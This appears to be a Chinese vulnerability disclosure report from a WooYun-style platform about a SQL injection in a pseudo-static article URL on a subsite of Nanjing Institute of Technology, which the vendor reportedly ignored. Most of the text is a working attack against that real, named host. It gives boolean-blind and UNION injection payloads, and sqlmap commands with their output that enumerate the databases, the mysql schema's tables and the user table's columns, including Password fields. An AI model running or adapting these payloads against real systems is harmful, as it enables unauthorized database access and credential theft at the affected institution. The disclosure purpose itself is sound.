2014-06-05: 细节已通知厂商并且等待厂商处理中 2014-06-10: 厂商已经主动忽略漏洞,细节向公众公开
南京工程学院某分站#伪静态 Injection
伪静态 Injection地址:
http://dlx.njit.edu.cn/index.php/Article/page/id/198.shtml
---Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://dlx.njit.edu.cn:80/index.php/Article/page/id/198 AND 1397=1397.shtml Type: UNION query Title: MySQL UNION query (NULL) - 24 columns Payload: http://dlx.njit.edu.cn:80/index.php/Article/page/id/-6579 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6f6271,0x5161594c7175426d4c58,0x71676b6671),NULL,NULL,NULL#.shtml---
#1、获取数据库:
sqlmap -u http://dlx.njit.edu.cn/index.php/Article/page/id/198*.shtml --dbs
available databases [12]: [*] bysj[*] bysj2[*] bysj_back[*] bysjback[*] dlx[*] dlxy[*] dqgcsjzx[*] information_schema[*] mysql[*] performance_schema[*] test[*] texiaoku
#2、获取表段:
sqlmap -u http://dlx.njit.edu.cn/index.php/Article/page/id/198*.shtml -D mysql --tables
Database: mysql [24 tables]+---------------------------+| user || columns_priv || db || event || func || general_log || help_category || help_keyword || help_relation || help_topic || host || ndb_binlog_index || plugin || proc || procs_priv || proxies_priv || servers || slow_log || tables_priv || time_zone || time_zone_leap_second || time_zone_name || time_zone_transition || time_zone_transition_type |+---------------------------+
#3、获取字段:
sqlmap -u http://dlx.njit.edu.cn/index.php/Article/page/id/198*.shtml -D mysql -T user --columns
Database: mysql Table: user[42 columns]+------------------------+-----------------------------------+| Column | Type |+------------------------+-----------------------------------+| User | char(16) || Alter_priv | enum('N','Y') || Alter_routine_priv | enum('N','Y') || authentication_string | text || Create_priv | enum('N','Y') || Create_routine_priv | enum('N','Y') || Create_tablespace_priv | enum('N','Y') || Create_tmp_table_priv | enum('N','Y') || Create_user_priv | enum('N','Y') || Create_view_priv | enum('N','Y') || Delete_priv | enum('N','Y') || Drop_priv | enum('N','Y') || Event_priv | enum('N','Y') || Execute_priv | enum('N','Y') || File_priv | enum('N','Y') || Grant_priv | enum('N','Y') || Host | char(60) || Index_priv | enum('N','Y') || Insert_priv | enum('N','Y') || Lock_tables_priv | enum('N','Y') || max_connections | int(11) unsigned || max_questions | int(11) unsigned || max_updates | int(11) unsigned || max_user_connections | int(11) unsigned || Password | char(41) || plugin | char(64) || Process_priv | enum('N','Y') || References_priv | enum('N','Y') || Reload_priv | enum('N','Y') || Repl_client_priv | enum('N','Y') || Repl_slave_priv | enum('N','Y') || Select_priv | enum('N','Y') || Show_db_priv | enum('N','Y') || Show_view_priv | enum('N','Y') || Shutdown_priv | enum('N','Y') || ssl_cipher | blob || ssl_type | enum('','ANY','X509','SPECIFIED') || Super_priv | enum('N','Y') || Trigger_priv | enum('N','Y') || Update_priv | enum('N','Y') || x509_issuer | blob || x509_subject | blob |+------------------------+-----------------------------------+
:)
危害等级:无影响厂商忽略
忽略时间:2014-06-10 10:42
暂无
